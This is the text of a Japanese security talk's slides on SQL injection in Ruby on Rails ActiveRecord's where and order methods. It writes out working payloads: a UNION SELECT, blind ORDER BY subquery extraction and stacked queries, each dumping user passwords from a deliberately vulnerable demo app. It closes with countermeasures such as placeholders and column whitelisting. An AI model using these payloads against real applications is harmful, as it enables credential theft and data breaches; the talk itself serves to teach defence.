Rails SQL Injection Examplesの紹介

Rails SQL Injection Examplesの紹介
2014年6月11日
徳丸浩

Rails SQL Injection Examplesとは
Copyright © 2010-2014 HASH Consulting Corp.
2

Rails SQL Injection Examplesとは
3http://rails-sqli.org/ より引用
Ruby on Railsの
ActiveRecordのメソッド
やオプションの指定方法
の誤りによるSQLインジェ
クションのサンプル集

Example1:whereメソッド

whereメソッドの用途と注意点
• SQLのWHERE句を「生で」指定できる
• 文字列連結でWHERE句を組み立てると、普通
にSQLインジェクション脆弱となる
• 正しくはプレイスホルダを使う（後述）
• 前述の例は認証回避の例だが…飽きたw
5

脆弱性のあるアプリケーション
6
@books = Book.where(
"publish = '#{params[:publish]}' AND price >= #{params[:price]}")
山田祥寛 (著)
Ruby on Rails 4 アプリケーションプログラミング
技術評論社 (2014/4/11)
に脆弱性を加えましたw
※元本に脆弱性があるわけではありません

UNION SELECTにより個人情報を窃取
7
priceに以下を入れる
1) UNION SELECT
id,userid,passwd,null,mail,null,false,created_at,updated_at FROM users --
SELECT “books”.* FROM “books” WHERE (publish =’’ AND price >=
1) UNION SELECT id,userid,passwd,null,mail,null,false,created_at,
updated_at FROM users --)

対策プレースホルダ
8Ruby on Rails 4 アプリケーションプログラミング、山田祥寛より引用

Example2: orderメソッド

ORDER BY (CASE SUBSTR(password, 1, 1) WHEN 's' THEN 0 else 1 END) ASC って?
• ORDER BY の後には式が書ける
• 以下のSQL文は算数と国語の点数の合計でソートす
る
– SELECT * FROM 成績 ORDER BY (算数+国語)
• 以下の式は、password列の一文字目が s なら 0
そうでなければ 1 を返す
– CASE SUBSTR(password, 1, 1)
WHEN 's' THEN 0
ELSE 1
END
• よって、このORDER BYは、「パスワードの一文字目
が s」の利用者を先頭に集めるソート…だが、しかし
10

どういうページを想定しているのか?
11
こういうページですか? わかりません (>_<)
これでは、
元々が個人情
報漏えいだw

課題は二つ
• 個人情報の一覧ページがあり、ソート順を指定で
きるという想定が現実的でない
• 特定のソート条件は指定できるが、該当件数が
わからない
13

改良1: 別の一覧と個人情報をマップする
14

ORDER BYの副問い合わせ
16
FROM books, users WHERE books.id=users.id order by (select
case when userid='ockeghem' then 0 else 1 end from users where
books.id=users.id);
(select case
when userid='ockeghem' then 0 -- userid='ockeghem' を先頭に
else 1 -- その他は後ろに
end from users where books.id=users.id)
ORDER BY の副問い合わせ

userid=ockeghemと対応する行を見つける
17
case when userid='ockeghem' then 0 else 1 end from users where
books.id=users.id);
----+------------------------------------+-----------+--------
先頭行がuserid=ockeghemに対応

改良2: セパレータとなる行を挟む
18

ORDER BYの副問い合わせ
19
=# SELECT books.id, books.title, users.userid, users.passwd
case userid when 'tanaka' then 0 when 'ockeghem' then 1 else 2
end from users where books.id=users.id);
(select case userid
when 'tanaka' then 0 -- 'tanaka' を先頭に
when 'ockeghem' then 1 -- 'ockeghem' はセパレータ
else 2 -- その他は後ろに
end from users where books.id=users.id)
※セパレータがないと、'tanaka'が存在しない場合を区別できない
ORDER BY の副問い合わせ

userid=tanakaと対応する行を見つける
20
wasbook=# SELECT books.id, books.title, users.userid,
users.passwd FROM books, users WHERE books.id=users.id order
by (select case userid when 'tanaka' then 0 when 'ockeghem'
then 1 else 2 end from users where books.id=users.id);
----+------------------------------------+-----------+--------
userid=ockeghemをセパレータに

デモを見やすくするために書籍タイトルにユーザ名を併記
21
※デモを見やすくするための表示であり、「改ざん」をするという想定ではありません
辞書攻撃で発
見したユーザ

パスワードに対する辞書攻撃(1)
22
SELECT "books".* FROM "books" ORDER BY (select case when
userid='ockeghem' then 1 when passwd='abcd' then 0 else 2 end
from users where books.id=users.id) asc
select case
when userid='ockeghem' then 1 -- セパレータ
when passwd='abcd' then 0 -- passwd='abcd' を先頭に
else 2
end
from users where books.id=users.id
tanakaのパスワードがabcdと判明

パスワードに対する辞書攻撃(2)
23
SELECT "books".* FROM "books" ORDER BY (select case when
userid='ockeghem' then 1 when passwd='bcda' then 0 else 2 end
from users where books.id=users.id) asc
select case
when passwd='bcda' then 0 -- passwd='bcda' を先頭に
else 2
end
from users where books.id=users.id
passwd=bcda は存在しないことが判明

一文字ずつ試行するブラインドSQL
インジェクション
24

パスワードの1文字目が a の利用者を探す
25
select id, title from books order by (select case when
userid='ockeghem' then 1 when SUBSTR(passwd,1,1)='a' then 0
else 2 end from users where books.id=users.id) asc
select case
when SUBSTR(passwd,1,1)='a' then 0 –- 1文字目が a を先頭に
else 2
end from users where books.id=users.id
tanakaとyamadaのパスワード
1文字目がaと判明

1回の試行で1種類の文字チェック
しかできないのは不効率だが…
26

セパレータを増やせば、一度に多く
の文字をチェック可能
27

aaaa, bbbb, cccc, ddddの4ユーザを登録
28
(select case userid
when 'aaaa' then 0
when 'bbbb' then 1
when 'cccc' then 2
when 'dddd' then 3
else 4
end from users where
books.id=users.id)

パスワードの一文字目をまとめてクエリ
29
(SELECT CASE
WHEN userid='aaaa' THEN 1
WHEN userid='bbbb' THEN 3
WHEN userid='cccc' THEN 5
WHEN userid='dddd' THEN 7
WHEN SUBSTR(passwd,1,1)='a' THEN 0
WHEN SUBSTR(passwd,1,1)='b' THEN 2
WHEN SUBSTR(passwd,1,1)='c' THEN 4
WHEN SUBSTR(passwd,1,1)='d' THEN 6
ELSE 99
END FROM users WHERE books.id=users.id)
※ 簡単化のためパスワードは a～d 4文字で構成とする

パスワードの1文字目を探索
30
tanakaとyamadaのパスワード
1文字目がaと判明
takahashiのパスワード1文字目がcと判明
ockeghemのパスワード1文字目がdと判明
tanaka a***
yamada a***
takahashi c***
ockeghem d***

31
takahashiのパスワード2文字目がdと判明
ockeghemのパスワード2文字目がcと判明
tanaka ab**
yamada aa**
takahashi cd**
ockeghem dc**
tanakaのパスワード2文字目がbと判明
yamadaのパスワード2文字目がaと判明

32
tanakaとtakahashiのパスワード
3文字目がcと判明
yamadaのパスワード3文字目がaと判明
ockeghemのパスワード3文字目がbと判明
tanaka abc*
yamada aaa*
takahashi cdc*
ockeghem dcb*

33
ockeghemとyamadaのパスワ
ード1文字目がaと判明
tanaka abcd
yamada aaaa
takahashi cdcd
ockeghem dcba
tamalaとtakahashiのパスワー
ド4文字目が d と判明

もっと簡単な方法はないのか?
34

UNION(not ONION) は?
35

ORDER BYの後にUNIONは使えない
36
PG::SyntaxError: ERROR: "UNION"またはその近辺で構文エラー
LINE 1: SELECT "books".* FROM "books" ORDER BY title
UNION SELECT ...
^
: SELECT "books".* FROM "books" ORDER BY title UNION
SELECT * FROM users -- asc

PostgreSQLの場合、複文は使え
ないか?
37

やはりエラーになる
38
missing attribute: isbn
SELECT "books".* FROM "books" ORDER BY title;SELECT * FROM users -- asc

しかし、missing attribute: isbn
なら、別名として与えてやれば…
39

ユーザー情報の窃取に成功
40
SELECT "books".* FROM "books" ORDER BY title;SELECT id,userid AS
isbn,passwd AS title,1 AS price,mail AS publish,null AS published,false AS cd FROM
users-- asc

対策
42

表名、列名によるSQLインジェクションの対策
• 以下のいずれか、あるいは複数を実施
• 列名をクォート&エスケープする
• 列名が許可されたものかどうかを検査する
– いわゆるホワイトリスト検査
• 列を数字で指定して、内部で列名に変換する
43

列名をシンボルに変換すると、クォート&エスケープされるが
44
SELECT "books".* FROM "books" ORDER BY "books"."title""a" ASC
def index
p = params[:order].to_sym
@books = p ? Book.order(p) : Book.all
end

ユーザ入力を無条件にシンボルに変換するのはまずい
• シンボルはGCで回収されない
• 外部から任意のシンボルを作れる場合、非常に多数のシンボルを作ら
れるとメモリを過度に消費してしまう
• 類似の例にCVE-2014-0082がある
• 列名のホワイトリスト検査と併用ならば可（シンボル数が抑制される）
45
http://jvndb.jvn.jp/ja/contents/2014/JVNDB-2014-001439.html より引用

まとめ
• Ruby on RailsのActiveRecordの使い方に起因するSQLイン
ジェクションを紹介
• ActiveRecordのメソッドには、与えられた文字列が「そのま
ま」SQL文に展開されるものがある
• 値パラメータについてはプレースホルダを活用
• 表名、列名、キーワードについては以下のいずれかを行う
– 表名、列名、キーワードのホワイトリスト検査
– 外部では番号で指定して、内部で表名、列名、キーワード等に変換
する
• SQL識別子のクォート&エスケープをさせる目的で、Rubyの
識別子を積極的に活用することの是非については有識者の
ご意見をお伺いしたいです
46

Rails SQL Injection Examplesの紹介

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Viewers also liked

Viewers also liked (20)

Similar to Rails SQL Injection Examplesの紹介

Similar to Rails SQL Injection Examplesの紹介 (20)

More from Hiroshi Tokumaru

More from Hiroshi Tokumaru (20)

Rails SQL Injection Examplesの紹介